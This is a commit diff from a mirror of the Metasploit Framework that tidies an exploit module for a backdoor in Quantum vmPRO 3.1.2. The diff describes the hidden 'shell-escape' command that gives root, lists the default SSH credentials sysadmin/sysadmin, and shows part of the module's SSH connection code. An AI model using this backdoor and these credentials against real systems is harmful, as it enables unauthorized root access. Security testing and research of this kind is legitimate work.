infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Do minor clean up

bug/bundler_fix
jvazquez-r7 2014-03-18 06:11:02 -05:00
parent c116697c70
commit f656e5fedb
1 changed files with 10 additions and 10 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb
View File

@ -15,18 +15,18 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info, super(update_info(info,
'Name' => "Quantum vmPRO Backdoor Command", 'Name' => "Quantum vmPRO Backdoor Command",
'Description' => %q{ 'Description' => %q{
This module exploits a backdoor command flaw in vmPRO 3.1.2. This module abuses a backdoor command in vmPRO 3.1.2. Any user, even without admin
Any user without admin privileges can get access to the restricted SSH shell. privileges, can get access to the restricted SSH shell. By using the hidden backdoor
By using the hidden backdoor "shell-escape" command it's possible to drop to "shell-escape" command it's possible to drop to a real root bash shell.
a real root bash shell.
}, },
'License' => MSF_LICENSE, 'License' => MSF_LICENSE,
'Author' => 'Author' =>
[ [
'xistence <xistence[at]0x90.nl>', # Original discovery and Metasploit module 'xistence <xistence[at]0x90.nl>' # Original discovery and Metasploit module
], ],
'References' => 'References' =>
[ [
['URL', 'http://packetstormsecurity.com/files/125760/quantumvmpro-backdoor.txt']
], ],
'DefaultOptions' => 'DefaultOptions' =>
{ {
@ -51,7 +51,6 @@ class Metasploit3 < Msf::Exploit::Remote
register_options( register_options(
[ [
Opt::RHOST(),
Opt::RPORT(22), Opt::RPORT(22),
OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']), OptString.new('USER', [ true, 'vmPRO SSH user', 'sysadmin']),
OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin']) OptString.new('PASS', [ true, 'vmPRO SSH password', 'sysadmin'])
@ -98,18 +97,19 @@ class Metasploit3 < Msf::Exploit::Remote
ssh = Net::SSH.start(rhost, user, opts) ssh = Net::SSH.start(rhost, user, opts)
end end
rescue Rex::ConnectionError, Rex::AddressInUse rescue Rex::ConnectionError, Rex::AddressInUse
return return nil
rescue Net::SSH::Disconnect, ::EOFError rescue Net::SSH::Disconnect, ::EOFError
print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation" print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
return return nil
rescue ::Timeout::Error rescue ::Timeout::Error
print_error "#{rhost}:#{rport} SSH - Timed out during negotiation" print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
return return nil
rescue Net::SSH::AuthenticationFailed rescue Net::SSH::AuthenticationFailed
print_error "#{rhost}:#{rport} SSH - Failed authentication" print_error "#{rhost}:#{rport} SSH - Failed authentication"
return nil
rescue Net::SSH::Exception => e rescue Net::SSH::Exception => e
print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}" print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
return return nil
end end
if ssh if ssh